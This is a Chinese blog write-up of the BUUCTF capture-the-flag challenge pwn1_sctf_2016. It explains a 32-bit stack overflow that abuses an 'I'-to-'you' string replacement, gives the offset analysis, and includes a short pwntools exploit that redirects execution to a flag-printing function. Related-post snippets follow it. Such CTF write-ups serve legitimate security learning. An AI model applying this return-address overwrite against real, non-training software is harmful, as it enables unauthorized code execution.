BUUCTF|PWN-pwn1_sctf_2016

最新推荐文章于 2025-09-16 21:22:32 发布

原创最新推荐文章于 2025-09-16 21:22:32 发布 · 759 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #pwn #python #linux #c语言

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

本文详细解析了如何在32位系统中利用fgets溢出漏洞，通过精心构造payload，将20个'I'替换为'you'，进而获取flag地址。通过IDA进行逆向分析和脚本实现远程攻击。

1.checksec+运行

32位+NX保护

2.IDA进行中

1.vul函数

fgets()溢出函数

跟进s查看偏移

offset=0x3c+4

0x3c十进制为60

再来分析函数

replace函数:替换

先写入字符串you

再写入字符串I

然后将I 替换成you

这样的话1个字节就变成了3个

那么我们用20个I,就能换成20个you,60个字节

再加上get flag 的地址

3.脚本

from pwn import*
#p=process("./5sctf_2016")
p=remote("node4.buuoj.cn",25225)
flag_addr=0x08048F0D	
payload=b'I'*20+b'a'*4+p32(flag_addr)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

buuctf之pwn1_sctf_2016

weixin_54452942的博客

03-27

926

简单易懂~

【BUUCTF-PWN】5-pwn1_sctf_2016

燕麦葡萄干的博客

07-04

349

变量s在栈中的位置位0x3c，想要溢出到Rbp需要60+4（因为是32位）=64。fgets()函数只允许输入32位长度，但是I可以变为you，因此可以输入20个I加三个a。这里中间处理的代码还看不太懂，只能看到you、i还有replace字符替换函数。试着运行效果如下，可知代码会把输入的I替换为you。找一下后门函数，函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位，开启了NX保护。

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF Pwn pwn1_sctf_2016

MrTreebook的博客

12-05

1463

BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址点击下载题目 2.checksec检查保护运行一下看看 3.IDA分析看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF

BUUCTF pwn1_sctf_2016 1 wp

最新发布

AEJL叁的博客，欢迎关注！

09-16

975

显示除了NX保护均未开启或完全启用，说明此题难度系数不高，而NX开启说明数据区域（如栈、堆）不可执行，是防止将。写入数据区后跳转执行，所以可优先考虑不利用shellcode注入且简单直接的方式寻找漏洞。字符串，就可以精确覆盖返回地址，从而劫持程序的执行流程。来看，它本身并不会直接导致栈溢出，所以漏洞的关键在于后续对字符串的处理和复制操作。，实现 strcpy 的溢出。函数的设计是安全的，它的工作方式如下：从指定的流 (所以，关键就是利用安全输入的字符串经过替换操作后的。中写入超过 32 字节的数据。

[buuctf]pwn1_sctf_2016

逆向萌新的博客

05-30

2023

buuctf：pwn题pwn1_sctf_2016（细致分析）

buuctf-pwn1 sctf 2016

weixin_45427676的博客

09-20

810

拿到文件后checksec一下，发现开启了NX保护，说明堆栈不可执行，那我们就不能向堆栈上写东西。查看一下程序 main()函数调用了vuln()函数，查看一下此函数有没有什么漏洞可以利用，enmenm,发现代码很多不知道什么意思（太菜了太菜了），好好看看这些代码到底啥意思吧~~,部分代码注释如下：本来看到代码5处，想着能通过向缓冲区S中写入数据，利用栈溢出来覆盖返回地址为后门函数地址，但是fgets()函数告诉我此法不行，因为你最多只能向S中输入32个字符，而缓冲区S的大小为0x3c，也就是需要输入

BUUCTF|PWN-pwn1_sctf_2016-WP

l2645470582_的博客

07-29

918

1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件，我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串，ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln（）关键函数，双击进去 3.5、我们看见关键字变量名溢出，双击查看 s地址： r地址： ...

BUUCTF-PWN题详解（pwn1_sctf_2016 1&jarvisoj_level0 1）

2302_80325559的博客

11-27

2653

今天给大家介绍了几个危险函数strcpy、read，以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题，思路大差不差，都是先找从哪儿溢出，然后后门的地址。如果大家可以自己独立做出来的话，就可以说只要以后见到这种题，分分钟拿下。后面的题就不会留这么明显的后门给我们了，会让我们自己创建后门，难度会大一点点。我尽量以简洁的语言给大家说清楚，大家一起加油！

BUUCTF pwn——pwn2_sctf_2016

CNS-Enterprise BCC-1701-J

04-18

490

BUUCTF 做题练习

[BUUCTF-pwn]——pwn1_sctf_2016

Y_peak的博客

01-30

1131

[BUUCTF-pwn]——pwn1_sctf_2016 题目地址：https://buuoj.cn/challenges#pwn1_sctf_2016 题目：话不多说，先下载下来再说。在Linux上 checksec一下，发现开启了NX保护，但是没有开启Stack的保护，也就是说我们可以很轻易的利用栈溢出。在window的IDA上反汇编看下源码，额，main函数没有什么有用的信息。我们可以看下vuln函数。发现好大一堆，发现了fgets函数，但是很遗憾。它要求我们只能输入不超过32个字符。

BUUCTF-PWN-pwn1_sctf_2016

m0_64180167的博客

04-13

630

就刚刚好满足了get的溢出然后再输入4个垃圾字符就可以实现函数返回再将 get flag返回地址填入即可。因为you占3字节我们只能输入 32个一个i =三个字节所以我们输入 20个I 就可以占 60 字节。原本看别人的博客是说replace函数替换了但是我看不明白很简单的办法。然后进行发现是32 所以我们记住如果栈溢出漏洞我们需要4个字节填满基地址。发现get 但是只能输入 32个所以无法实现栈溢出。发现进行了替换这样我们就可以执行栈溢出。

BUUCTF pwn1_sctf_2016

CHAWUCIREN1的博客

04-08

3544

执行一下似乎出现第一个i被替换成you 检查一下保护机制丢到ida里面输入的变量s大小为0x3c，但是我们看fgets里面，我们只能输入32个字符，没法进行溢出，我们在输入的时候，会发现i会被替换成you，所以我们可以利用20个i来填充，找到shell，地址为0x8048F0D 返回地址再随便填四个字符我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p

BUUCTF pwn——pwn1_sctf_2016

CNS-Enterprise BCC-1701-J

03-12

249

BUUCTF 做题练习

[BUUCTF]——pwn1_sctf_2016

m0_68381884的博客

03-28

571

拿到文件先检查一下得出结论这是32位程序且开启了nx保护。用32位ida打开文件，并使用ida分析，看到较为敏感的“get flag” 双击跟进，找到函数后按F5将其反编译得到我们熟悉的伪代码看到这个函数的作用就是输出“flag.txt”里的内容，记一下地址flag_addr=08048F0D 进入main函数双击 vuln 函数， 0x02 编写exp: from pwn import* r=remote("redirect.do-not-trust.h.

buuctf pwn1_sctf_2016

A_fish_like_sing的博客

03-21

264

buu ctf pwn1_sctf_2016

(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

J1ayの博客

09-10

1759

⭐ 【buuctf】pwn入门 pwn学习之路引入栈溢出引入 ⭐test_your_nc 【题目链接】注意到 Ubuntu 18， Linux系统。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”；使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点，最多8个 -G num源路由指针：4，8，12。。。 -i secs 发送的线

BUUCTF刷题之路-pwn1_sctf_20161

qq_30528603的博客

05-27

778

从我们的运行结果看，会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节，我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节，那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了，fgets函数较gets函数安全一点，他有长度限制，我们看到s离ebp的距离有0x3c那么远，但是fgets只能输入32个字节，只通过fgets溢出覆盖不到返回地址。看到有个fgets函数，并且限制长度为32。这是一个32位的程序，只开启了NX保护。

Buuctf pwn1_sctf_2016

qq_53809201的博客

03-19

660

checksec run ida 在程序中搜索既没有system又没有bin/sh,所以明显的rop nptr处可以使用整数溢出构造rop 然后可以利用printf函数来泄露程序的libc版本覆盖返回地址执行system来getshell exp from pwn import * from LibcSearcher import * context(os = 'linux', arch = 'i386', log_level = 'debug') elf = ELF("./pwn2") loca

pwn1_sctf_2016

02-09

### 关于 PWN1 SCTF 2016 CTF 比赛解题报告 #### 题目概述 PWN1 SCTF 2016 是一次涉及栈溢出漏洞利用的比赛项目。参赛者需理解二进制文件执行流程以及如何通过特定输入控制程序流来实现非授权操作[^2]。 #### 漏洞...